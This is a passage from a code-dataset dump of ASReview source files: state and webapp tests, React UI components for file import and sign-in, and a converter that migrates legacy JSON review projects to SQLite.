read_only=False) as state:\n state.add_record_table(record_table)\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 4)\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n state.query_top_ranked(3)\n\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert isinstance(pool, pd.Series)\n assert isinstance(labeled, pd.DataFrame)\n assert isinstance(pending, pd.Series)\n\n assert pool.name == \"record_id\"\n assert pending.name == \"record_id\"\n assert list(labeled.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list() == [7, 3, 2, 1]\n assert labeled[\"record_id\"].to_list() == [4, 5, 6]\n assert labeled[\"label\"].to_list() == [1, 0, 1]\n assert pending.to_list() == [10, 9, 8]\n\n pool2 = state.get_pool()\n labeled2 = state.get_labeled()\n pending2 = state.get_pending()\n\n assert isinstance(pool2, pd.Series)\n assert isinstance(labeled2, pd.DataFrame)\n assert isinstance(pending2, pd.Series)\n\n assert pool2.name == \"record_id\"\n assert pending2.name == \"record_id\"\n assert list(labeled2.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list() == pool2.to_list()\n assert labeled[\"record_id\"].to_list() == labeled2[\"record_id\"].to_list()\n assert labeled[\"label\"].to_list() == labeled2[\"label\"].to_list()\n assert pending.to_list() == pending2.to_list()\n\n\ndef test_exist_new_labeled_records(tmpdir):\n record_table = range(1, 11)\n test_ranking = range(10, 0, -1)\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_table)\n\n assert not state.exist_new_labeled_records\n state.add_labeling_data([4, 5, 6], [1, 0, 1], prior=True)\n assert state.exist_new_labeled_records\n state.add_last_ranking(test_ranking, \"nb\", \"max\", \"double\", \"tfidf\", 3)\n assert not state.exist_new_labeled_records\n state.query_top_ranked(3)\n assert not state.exist_new_labeled_records\n state.add_labeling_data([8, 9, 10], [1, 1, 1])\n assert state.exist_new_labeled_records\n\n\ndef test_add_note(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_labeling_data(\n TEST_RECORD_IDS[:3], TEST_LABELS[:3], TEST_NOTES[:3], prior=True\n )\n\n note = \"An added note\"\n record_id = TEST_RECORD_IDS[1]\n state.add_note(note, record_id)\n record_data = state.get_data_by_record_id(record_id)\n assert record_data[\"notes\"][0] == note\n\n\ndef test_update_decision(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(TEST_RECORD_TABLE)\n state.add_labeling_data(TEST_RECORD_IDS[:3], TEST_LABELS[:3], prior=True)\n\n for i in range(3):\n state.update_decision(TEST_RECORD_IDS[i], 1 - TEST_LABELS[i])\n new_label = state.get_data_by_record_id(TEST_RECORD_IDS[i])[\"label\"][0]\n assert new_label == 1 - TEST_LABELS[i]\n\n state.update_decision(TEST_RECORD_IDS[1], TEST_LABELS[1])\n new_label = state.get_data_by_record_id(TEST_RECORD_IDS[1])[\"label\"][0]\n assert new_label == TEST_LABELS[1]\n\n change_table = state.get_decision_changes()\n changed_records = TEST_RECORD_IDS[:3] + [TEST_RECORD_IDS[1]]\n new_labels = [1 - x for x in TEST_LABELS[:3]] + [TEST_LABELS[1]]\n\n assert change_table[\"record_id\"].to_list() == changed_records\n assert change_table[\"new_label\"].to_list() == new_labels\n\n\ndef test_get_pool_labeled():\n with open_state(TEST_STATE_FP) as state:\n pool, labeled, _ = state.get_pool_labeled_pending()\n\n assert isinstance(pool, pd.Series)\n assert pool.name == \"record_id\"\n assert isinstance(labeled, pd.DataFrame)\n assert list(labeled.columns) == [\"record_id\", \"label\"]\n\n assert pool.to_list()[:10] == TEST_POOL_START\n assert labeled[\"record_id\"].to_list() == TEST_RECORD_IDS\n assert labeled[\"label\"].to_list() == TEST_LABELS\n\n\ndef test_last_ranking(tmpdir):\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n record_ids = [1, 2, 3, 4, 5, 6]\n ranking = [1, 3, 4, 6, 2, 5]\n classifier = \"nb\"\n query_strategy = \"max\"\n balance_strategy = \"double\"\n feature_extraction = \"tfidf\"\n training_set = 2\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_ids)\n state.add_last_ranking(\n ranking,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n )\n\n last_ranking = state.get_last_ranking()\n assert isinstance(last_ranking, pd.DataFrame)\n assert list(last_ranking.columns) == [\n \"record_id\",\n \"ranking\",\n \"classifier\",\n \"query_strategy\",\n \"balance_strategy\",\n \"feature_extraction\",\n \"training_set\",\n \"time\",\n ]\n\n assert last_ranking[\"ranking\"].to_list() == [0, 1, 2, 3, 4, 5]\n assert last_ranking[\"record_id\"].to_list() == ranking\n assert last_ranking[\"classifier\"].to_list() == [classifier] * len(record_ids)\n\n\ndef test_get_pool():\n with open_state(TEST_STATE_FP) as state:\n pool = state.get_pool()\n\n assert isinstance(pool, pd.Series)\n assert len(pool) == 841\n assert pool[:10].to_list() == TEST_POOL_START\n\n\ndef test_get_labeled():\n with open_state(TEST_STATE_FP) as state:\n labeled = state.get_labeled()\n\n assert isinstance(labeled, pd.DataFrame)\n assert labeled[\"record_id\"].to_list() == TEST_RECORD_IDS\n assert labeled[\"label\"].to_list() == TEST_LABELS\n\n\ndef test_add_extra_column(tmpdir):\n \"\"\"Check if state still works with extra colums added to tables.\"\"\"\n project_path = Path(tmpdir, \"test.asreview\")\n ASReviewProject.create(project_path)\n\n with open_state(project_path, read_only=False) as state:\n con = state._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"ALTER TABLE last_ranking ADD COLUMN test_lr INTEGER;\")\n cur.execute(\"ALTER TABLE results ADD COLUMN test_res INTEGER;\")\n con.commit()\n con.close()\n\n record_ids = [1, 2, 3, 4, 5, 6]\n ranking = [1, 3, 4, 6, 2, 5]\n classifier = \"nb\"\n query_strategy = \"max\"\n balance_strategy = \"double\"\n feature_extraction = \"tfidf\"\n training_set = 2\n\n with open_state(project_path, read_only=False) as state:\n state.add_record_table(record_ids)\n state.add_last_ranking(\n ranking,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n )\n\n top_ranked = state.query_top_ranked(1)\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert len(pending) == 1\n assert len(pool) == len(record_ids) - 1\n assert len(labeled) == 0\n\n state.add_labeling_data(top_ranked, [0 for _ in top_ranked])\n pool, labeled, pending = state.get_pool_labeled_pending()\n assert len(pending) == 0\n assert len(pool) == len(record_ids) - 1\n assert len(labeled) == 1\n" }, { "alpha_fraction": 0.6526492834091187, "alphanum_fraction": 0.6576955318450928, "avg_line_length": 30.289474487304688, "blob_id": "34274fbbc6540e2a420c13958a8790fcac65d553", "content_id": "f27948141b7b5e5619229a081fd17e870a760ae1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "permissive", "max_line_length": 81, "num_lines": 38, "path": "/asreview/webapp/tests/test_api/test_webapp.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from flask import current_app\n\nimport asreview.webapp.tests.utils.api_utils as au\nfrom asreview.webapp.tests.utils import misc\n\n\n# Test if index.html is available!\n# Note: This test will fail if build is missing. Please run\n# `python setup.py compile_assets` first.\ndef test_landing(setup):\n client, _, _ = setup\n\n status_code, _, html = au.call_root_url(client)\n assert status_code == 200\n assert (\n \"<title>ASReview LAB - A tool for AI-assisted systematic reviews</title>\"\n in html\n ) # noqa\n\n\n# Test boot data!\ndef test_boot(setup_all_clients):\n status_code, data = au.call_boot_url(setup_all_clients)\n assert status_code == 200\n assert isinstance(data, dict)\n assert \"authentication\" in data.keys()\n assert \"status\" in data.keys()\n assert \"version\" in data.keys()\n if misc.current_app_is_authenticated():\n assert data[\"authentication\"]\n assert data[\"allow_account_creation\"] == current_app.config.get(\n \"ALLOW_ACCOUNT_CREATION\"\n )\n assert data[\"email_verification\"] == current_app.config.get(\n \"EMAIL_VERIFICATION\", False\n )\n else:\n assert not data[\"authentication\"]\n" }, { "alpha_fraction": 0.5275911688804626, "alphanum_fraction": 0.5417466163635254, "avg_line_length": 22.548023223876953, "blob_id": "b1e5cf3a70e60485fe8107011f6597566c4cd7c1", "content_id": "46264ee9adcb84a5e37a1ee8aa6540ccbad16ade", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4168, "license_type": "permissive", "max_line_length": 79, "num_lines": 177, "path": "/asreview/webapp/src/ProjectComponents/ImportFromFile.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React, { useCallback, useMemo } from \"react\";\nimport { useDropzone } from \"react-dropzone\";\nimport {\n Avatar,\n Box,\n Button,\n ButtonBase,\n Stack,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { FileUpload } from \"@mui/icons-material\";\n\nimport { InlineErrorHandler } from \"../Components\";\n\nconst PREFIX = \"ImportFromFile\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n singleLine: `${PREFIX}-single-line`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n width: \"100%\",\n [`& .${classes.root}`]: {\n display: \"flex\",\n alignItems: \"center\",\n },\n\n [`& .${classes.singleLine}`]: {\n display: \"-webkit-box\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 1,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n}));\n\nconst baseStyle = {\n height: \"100%\",\n flex: 1,\n display: \"flex\",\n flexDirection: \"column\",\n alignItems: \"center\",\n justifyContent: \"center\",\n padding: \"80px 20px 80px 20px\",\n borderWidth: 2,\n borderRadius: 2,\n borderColor: \"#eeeeee\",\n borderStyle: \"dashed\",\n outline: \"none\",\n transition: \"border .24s ease-in-out\",\n};\n\nconst activeStyle = {\n borderColor: \"#2196f3\",\n};\n\nconst acceptStyle = {\n borderColor: \"#00e676\",\n};\n\nconst rejectStyle = {\n borderColor: \"#ff1744\",\n};\n\nconst ImportFromFile = ({\n acceptFormat,\n addFileError,\n file,\n setFile,\n isAddFileError,\n isAddingFile,\n reset,\n}) => {\n const onDrop = useCallback(\n (acceptedFiles) => {\n if (acceptedFiles.length !== 1) {\n console.log(\"No valid file provided\");\n return;\n }\n\n // set error to state\n if (isAddFileError) {\n reset();\n }\n // set the state such that we ca upload the file\n setFile(acceptedFiles[0]);\n },\n [setFile, isAddFileError, reset],\n );\n\n const {\n getRootProps,\n getInputProps,\n isDragActive,\n isDragAccept,\n isDragReject,\n open,\n } = useDropzone({\n onDrop: !isAddingFile ? onDrop : false,\n multiple: false,\n noClick: true,\n accept: acceptFormat,\n });\n\n const style = useMemo(\n () => ({\n ...baseStyle,\n ...(isDragActive ? activeStyle : {}),\n ...(isDragAccept ? acceptStyle : {}),\n ...(isDragReject ? rejectStyle : {}),\n }),\n [isDragActive, isDragReject, isDragAccept],\n );\n\n const returnAcceptFile = () => {\n if (acceptFormat !== \".asreview\") {\n return <Typography>Drag and drop a dataset file to add</Typography>;\n } else {\n return (\n <Typography>\n Drag and drop a project file (<code>.asreview</code>) to add\n </Typography>\n );\n }\n };\n\n return (\n <Root>\n <Box {...getRootProps({ style })}>\n <input {...getInputProps()} />\n <Stack className={classes.root} spacing={2}>\n <ButtonBase disabled={isAddingFile} disableRipple onClick={open}>\n <Avatar\n sx={{\n height: \"136px\",\n width: \"136px\",\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.800\" : \"grey.100\",\n }}\n >\n <FileUpload\n sx={{ height: \"65px\", width: \"65px\", color: \"grey.500\" }}\n />\n </Avatar>\n </ButtonBase>\n {returnAcceptFile()}\n {file && (\n <Typography className={classes.singleLine}>\n File <i>{file?.path}</i> selected.\n </Typography>\n )}\n {isAddingFile && acceptFormat === \".asreview\" && (\n <Typography sx={{ color: \"text.secondary\" }}>\n Importing...\n </Typography>\n )}\n {isAddingFile && acceptFormat !== \".asreview\" && (\n <Typography sx={{ color: \"text.secondary\" }}>Adding...</Typography>\n )}\n {isAddFileError && (\n <InlineErrorHandler\n message={addFileError?.message + \" Please try again.\"}\n />\n )}\n <Button disabled={isAddingFile} variant=\"contained\" onClick={open}>\n Select File\n </Button>\n </Stack>\n </Box>\n </Root>\n );\n};\n\nexport default ImportFromFile;\n" }, { "alpha_fraction": 0.5340531468391418, "alphanum_fraction": 0.5448504686355591, "avg_line_length": 25.461538314819336, "blob_id": "e3433e42ef45617c15506fdd29ee0275dbd9859c", "content_id": "82007e716ad44a2ef1b737b60bc0a17776150e6a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2408, "license_type": "permissive", "max_line_length": 80, "num_lines": 91, "path": "/asreview/webapp/src/Components/SignIn.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useSelector } from \"react-redux\";\nimport { Box, Card, CardContent, Fade, Stack, Typography } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { HelpPrivacyTermsButton, SignInForm } from \"../Components\";\n\nimport { WordmarkState } from \"../globals\";\nimport SignInOAuth from \"./SignInOAuth\";\n\nconst PREFIX = \"SignInForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n checkbox: `${PREFIX}-checkbox`,\n header: `${PREFIX}-header`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"450px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px\",\n },\n\n [`& .${classes.header}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n maxWidth: \"130px\",\n },\n}));\n\nconst SignIn = () => {\n const oAuthData = useSelector((state) => state.oAuthData);\n const allowAccountCreation =\n useSelector((state) => state.allow_account_creation) || false;\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <Stack className={classes.header} spacing={2}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Sign in</Typography>\n </Stack>\n <SignInForm\n classes={classes}\n allowAccountCreation={allowAccountCreation}\n />\n {Object.keys(oAuthData.services).length > 0 && (\n <SignInOAuth classes={classes} oAuthData={oAuthData} />\n )}\n </Stack>\n </CardContent>\n </Card>\n <HelpPrivacyTermsButton />\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default SignIn;\n" }, { "alpha_fraction": 0.6337579488754272, "alphanum_fraction": 0.6401273608207703, "avg_line_length": 23.153846740722656, "blob_id": "053c785512d57a63baed0cd7eddc7d3f098d4cca", "content_id": "fbfbab0cfe09061775193f1873d021f1026d88c9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 314, "license_type": "permissive", "max_line_length": 68, "num_lines": 13, "path": "/asreview/webapp/src/StyledComponents/StyledAlert.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Alert } from \"@mui/material\";\n\nexport function ExplorationModeRecordAlert(props) {\n return (\n <Alert\n severity=\"info\"\n sx={{ borderBottomRightRadius: 0, borderBottomLeftRadius: 0 }}\n >\n {`Labeled as ${props.label} in the dataset`}\n </Alert>\n );\n}\n" }, { "alpha_fraction": 0.620782732963562, "alphanum_fraction": 0.6288799047470093, "avg_line_length": 20.171428680419922, "blob_id": "1612e8a31b76fce69189c1d8d9635c6e13d37cd8", "content_id": "f50bcddb58e7be1884d5bb9b8ce216d5419b2d11", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 741, "license_type": "permissive", "max_line_length": 71, "num_lines": 35, "path": "/asreview/webapp/src/StyledComponents/StyledTypography.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Typography } from \"@mui/material\";\n\nexport function TypographyH5Medium(props) {\n return (\n <Typography\n variant=\"h5\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n\nexport function TypographyH6Medium(props) {\n return (\n <Typography\n variant=\"h6\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n\nexport function TypographySubtitle1Medium(props) {\n return (\n <Typography\n variant=\"subtitle1\"\n sx={{ fontWeight: (theme) => theme.typography.fontWeightMedium }}\n >\n {props.children}\n </Typography>\n );\n}\n" }, { "alpha_fraction": 0.5750090479850769, "alphanum_fraction": 0.5774024724960327, "avg_line_length": 31.421669006347656, "blob_id": "53cfe418d6abd762d4e840e7fb0820c508ac3c9a", "content_id": "4379d684cdcdfab2d5982dd1086be07224e690c0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22144, "license_type": "permissive", "max_line_length": 88, "num_lines": 683, "path": "/asreview/state/sql_converter.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport shutil\nimport sqlite3\nimport time\nfrom base64 import b64decode\nfrom datetime import datetime\nfrom io import BytesIO\nfrom pathlib import Path\nfrom uuid import uuid4\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import issparse\nfrom scipy.sparse import load_npz\nfrom scipy.sparse import save_npz\n\nfrom asreview._version import get_versions\nfrom asreview.state.errors import StateError\nfrom asreview.state.legacy.utils import open_state as open_state_legacy\n\nSQLSTATE_VERSION = \"1.0\"\nASREVIEW_FILE_EXTENSION = \".asreview\"\n\n\nclass StateConversionException(Exception):\n pass\n\n\ndef is_old_project(fp):\n \"\"\"Check if state file is old version.\"\"\"\n if Path(fp, \"reviews\").is_dir():\n return False\n else:\n return True\n\n\ndef get_old_project_status(config):\n # project is marked as finished\n if config.get(\"reviewFinished\", False):\n return \"finished\"\n\n # project init is not ready\n if \"projectInitReady\" in config and not config[\"projectInitReady\"]:\n return \"setup\"\n\n # project init flag is not available\n if \"projectInitReady\" not in config:\n if \"projectHasPriorKnowledge\" in config:\n if config[\"projectHasPriorKnowledge\"]:\n return \"review\"\n else:\n return \"setup\"\n\n return \"review\"\n\n\ndef decode_feature_matrix(jsonstate, data_hash):\n \"\"\"Get the feature matrix from a json state as a scipy csr_matrix.\"\"\"\n my_data = jsonstate._state_dict[\"data_properties\"][data_hash]\n encoded_X = my_data[\"feature_matrix\"]\n matrix_type = my_data[\"matrix_type\"]\n if matrix_type == \"ndarray\":\n return csr_matrix(encoded_X)\n elif matrix_type == \"csr_matrix\":\n with BytesIO(b64decode(encoded_X)) as f:\n return load_npz(f)\n return encoded_X\n\n\ndef upgrade_asreview_project_file(fp, from_version=0, to_version=1):\n \"\"\"Convert an old asreview project folder to the new format.\n\n Arguments\n ---------\n fp: str/path\n Location of the (unzipped) project file.\n\n Returns\n -------\n Converts the data in the project to the new format\n and adds it to the folder in place.\"\"\"\n\n if from_version != 0 and to_version != 1:\n raise ValueError(\n f\"Not possible to upgrade from v{from_version} to v{to_version}.\"\n )\n\n # Check if it is indeed an old format project.\n if not is_old_project(fp):\n raise ValueError(\n f\"There already is a 'reviews' folder at {fp}. \"\n f\"This project seems to be in new format.\"\n )\n\n # Current Paths\n fp = Path(fp)\n legacy_fp = Path(fp, \"legacy\")\n move_old_files_to_legacy_folder(fp)\n\n try:\n # Current paths.\n json_fp = Path(legacy_fp, \"result.json\")\n labeled_json_fp = Path(legacy_fp, \"labeled.json\")\n pool_fp = Path(legacy_fp, \"pool.json\")\n kwargs_fp = Path(legacy_fp, \"kwargs.json\")\n review_id = str(uuid4().hex)\n\n # Create the reviews folder and the paths for the results and settings.\n Path(fp, \"reviews\", review_id).mkdir(parents=True)\n sql_fp = str(Path(fp, \"reviews\", review_id, \"results.sql\"))\n settings_metadata_fp = Path(fp, \"reviews\", review_id, \"settings_metadata.json\")\n\n # Create the path for the feature matrix.\n\n # Create sqlite table with the results of the review.\n convert_json_results_to_sql(sql_fp, json_fp, labeled_json_fp)\n\n # Create sqlite tables 'last_probabilities'.\n convert_json_last_probabilities(sql_fp, json_fp)\n\n # Create the table for the last ranking of the model.\n create_last_ranking_table(sql_fp, pool_fp, kwargs_fp, json_fp)\n\n # Add the record table to the sqlite database as the table 'record_table'.\n convert_json_record_table(sql_fp, json_fp)\n\n # Create decision changes table.\n create_decision_changes_table(sql_fp)\n\n # Create json for settings.\n convert_json_settings_metadata(settings_metadata_fp, json_fp)\n\n # Create file for the feature matrix.\n with open(kwargs_fp, \"r\") as f:\n kwargs_dict = json.load(f)\n feature_extraction_method = kwargs_dict[\"feature_extraction\"]\n feature_matrix_fp = convert_json_feature_matrix(\n fp, json_fp, feature_extraction_method\n )\n\n # --- Upgrade the project.json file.\n\n # extract the start time from the state json\n with open(json_fp, \"r\") as f:\n start_time = json.load(f)[\"time\"][\"start_time\"]\n start_time = datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S.%f\")\n\n # open the project json and upgrade\n with open(Path(fp, \"project.json\"), \"r\") as f:\n project_config_old = json.load(f)\n\n project_config_new = upgrade_project_config(\n project_config_old,\n review_id,\n start_time,\n Path(feature_matrix_fp).name,\n feature_extraction_method,\n )\n\n # dump the project json\n with open(Path(fp, \"project.json\"), \"w\") as f:\n json.dump(project_config_new, f)\n except Exception as e:\n rollback_conversion(fp, check_is_converted=False)\n raise StateConversionException(\n f\"An error occurred during conversion of state \"\n f\"from {from_version} to {to_version}.\"\n ) from e\n\n\ndef move_old_files_to_legacy_folder(fp):\n \"\"\"Move the old files to a legacy folder.\n\n Arguments\n ----------\n fp: pathlib.Path\n Location of the (unzipped) project file.\n\n Returns\n -------\n Creates a folder 'legacy' in the project file, moves all current files to\n this legacy folder, and keeps a copy of 'project.json' and the data folder\n at the original place.\n \"\"\"\n\n project_content = list(fp.iterdir())\n\n # copy to legacy folder\n shutil.copytree(fp, Path(fp, \"legacy\"))\n\n # remove files and folders\n files_to_keep = [\"project.json\", \"data\", \"lock.sqlite\"]\n\n for f in project_content:\n if f.name not in files_to_keep:\n if f.is_file():\n f.unlink()\n elif f.is_dir():\n shutil.rmtree(f)\n else:\n pass\n\n\ndef upgrade_project_config(\n config,\n review_id=None,\n start_time=None,\n feature_matrix_name=None,\n feature_extraction_method=None,\n):\n \"\"\"Update the project.json file to contain the review information , the\n feature matrix information and the new state version number.\n\n Arguments\n ---------\n config: str/path\n Path to the project json file.\n review_id: str\n Identifier of the review.\n start_time: str\n String containing start time of the review.\n feature_matrix_fp: str/path\n Location of the feature matrix.\n feature_extraction_method: str\n Name of the feature extraction method.\n \"\"\"\n\n start_time_s = str(start_time) if start_time else None\n\n # Add the review information.\n config[\"reviews\"] = [\n {\n \"id\": review_id,\n \"start_time\": start_time_s,\n \"status\": get_old_project_status(config),\n }\n ]\n\n # Add the feature matrix information.\n config[\"feature_matrices\"] = [\n {\"id\": feature_extraction_method, \"filename\": feature_matrix_name}\n ]\n\n # Add the project mode.\n config[\"mode\"] = config.get(\"mode\", \"oracle\")\n\n # Update the state version.\n config[\"version\"] = get_versions()[\"version\"]\n config[\"state_version\"] = SQLSTATE_VERSION\n\n # set created_at_unix to start time (empty: None)\n if \"created_at_unix\" not in config:\n try:\n config[\"created_at_unix\"] = time.mktime(start_time.timetuple())\n except Exception:\n config[\"created_at_unix\"] = None\n\n config[\"datetimeCreated\"] = start_time_s\n\n # delete deprecated metadata\n config.pop(\"projectInitReady\", None)\n config.pop(\"projectHasPriorKnowledge\", None)\n config.pop(\"projectHasDataset\", None)\n\n return config\n\n\ndef convert_json_settings_metadata(fp, json_fp):\n \"\"\"Get the settings and metadata from a json state and save it as\n a json file at the location given by fp.\n\n Arguments\n ---------\n fp: str/path\n Path where to save the json file.\n json_fp: str/path\n Path to the json state file.\n \"\"\"\n data_dict = {}\n with open_state_legacy(json_fp) as json_state:\n data_dict[\"settings\"] = json_state._state_dict[\"settings\"]\n # The 'triple' balance strategy is no longer implemented.\n if data_dict[\"settings\"][\"balance_strategy\"] == \"triple\":\n data_dict[\"settings\"][\"balance_strategy\"] = \"double\"\n data_dict[\"state_version\"] = SQLSTATE_VERSION\n data_dict[\"software_version\"] = json_state._state_dict[\"software_version\"]\n data_dict[\"model_has_trained\"] = True\n\n # remove the outdated mode\n data_dict.pop(\"mode\", None)\n\n with open(fp, \"w\") as f:\n json.dump(data_dict, f)\n\n\ndef create_last_ranking_table(sql_fp, pool_fp, kwargs_fp, json_fp):\n \"\"\"Create the table which will contain the ranking of the last iteration of\n the model.\n\n Arguments\n ---------\n sql_fp: str/path\n Path where to save the record table. Should be a .sql file.\n \"\"\"\n\n with open(pool_fp) as f_pool:\n pool_ranking = json.load(f_pool)\n\n with open(kwargs_fp, \"r\") as f_kwargs:\n kwargs_dict = json.load(f_kwargs)\n\n # Add the record_ids not found in the pool to the end of the ranking.\n with open_state_legacy(json_fp) as json_state:\n record_table = get_json_record_table(json_state)\n records_not_in_pool = [\n record_id for record_id in record_table if record_id not in pool_ranking\n ]\n pool_ranking += records_not_in_pool\n\n # Convert the records in the pool to the new record ids (starting from 0).\n old_to_new_record_ids = {old_id: idx for idx, old_id in enumerate(record_table)}\n pool_ranking = [old_to_new_record_ids[record] for record in pool_ranking]\n\n # Set the training set to -1 (prior) for records from old pool.\n training_set = -1\n time = None\n\n last_ranking = [\n (\n v,\n i,\n kwargs_dict[\"model\"],\n kwargs_dict[\"query_strategy\"],\n kwargs_dict[\"balance_strategy\"],\n kwargs_dict[\"feature_extraction\"],\n training_set,\n time,\n )\n for i, v in enumerate(pool_ranking)\n ]\n\n with sqlite3.connect(sql_fp) as con:\n cur = con.cursor()\n\n # Create the last_ranking table.\n cur.execute(\n \"\"\"CREATE TABLE last_ranking\n (record_id INTEGER,\n ranking INT,\n classifier TEXT,\n query_strategy TEXT,\n balance_strategy TEXT,\n feature_extraction TEXT,\n training_set INTEGER,\n time INTEGER)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO last_ranking VALUES\n (?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n last_ranking,\n )\n con.commit()\n\n\ndef convert_json_last_probabilities(sql_fp, json_fp):\n \"\"\"Get the last ranking from a json state and save it as the table\n 'last_probabilities' in the .sql file at the location of sql_fp.\n\n Arguments\n ---------\n sql_fp: str/path\n Path where to save the record table. Should be a .sql file.\n json_fp: str/path\n Path to the json state file.\n \"\"\"\n with open_state_legacy(json_fp) as json_state:\n # Get the last predicted probabilities from the state file.\n # Also get the number of record labeled and the classifier.\n last_probabilities = json_state.pred_proba\n\n # Put them in the format for input in the sqlite database.\n last_probabilities = [(proba,) for proba in last_probabilities]\n\n with sqlite3.connect(sql_fp) as con:\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE last_probabilities\n (proba REAL)\"\"\"\n )\n cur.executemany(\n \"\"\"INSERT INTO last_probabilities VALUES\n (?)\"\"\",\n last_probabilities,\n )\n\n con.commit()\n\n\ndef get_json_state_data_hash(json_state):\n \"\"\"Get the data hash from a json state.\"\"\"\n return list(json_state._state_dict[\"data_properties\"].keys())[0]\n\n\ndef get_json_record_table(json_state):\n \"\"\"Get the record table from a json state.\"\"\"\n data_hash = get_json_state_data_hash(json_state)\n record_table = json_state._state_dict[\"data_properties\"][data_hash][\"record_table\"]\n return record_table\n\n\ndef convert_json_feature_matrix(fp, json_fp, feature_extraction_method):\n \"\"\"Get the feature matrix from a json state file. Save it in the feature\n matrices folder. Format is .npz if the matrix is sparse and .npy if the\n matrix is dense.\n\n Arguments\n ---------\n fp: str/path\n Project folder.\n json_fp: str/path\n Path to the json state file.\n feature_extraction_method: str\n Name of the feature extraction method.\n\n Returns\n -------\n pathlib.Path\n Path where the feature matrix is saved.\n \"\"\"\n feature_matrices_fp = Path(fp, \"feature_matrices\")\n feature_matrices_fp.mkdir()\n\n with open_state_legacy(json_fp) as json_state:\n data_hash = get_json_state_data_hash(json_state)\n feature_matrix = decode_feature_matrix(json_state, data_hash)\n if issparse(feature_matrix):\n save_fp = Path(\n feature_matrices_fp, f\"{feature_extraction_method}_feature_matrix.npz\"\n )\n save_npz(save_fp, feature_matrix)\n else:\n save_fp = Path(\n feature_matrices_fp, f\"{feature_extraction_method}_feature_matrix.npy\"\n )\n np.save(save_fp, feature_matrix)\n\n return save_fp\n\n\ndef convert_json_record_table(sql_fp, json_fp):\n \"\"\"Get the record table and save as the table 'record_table'\n in the 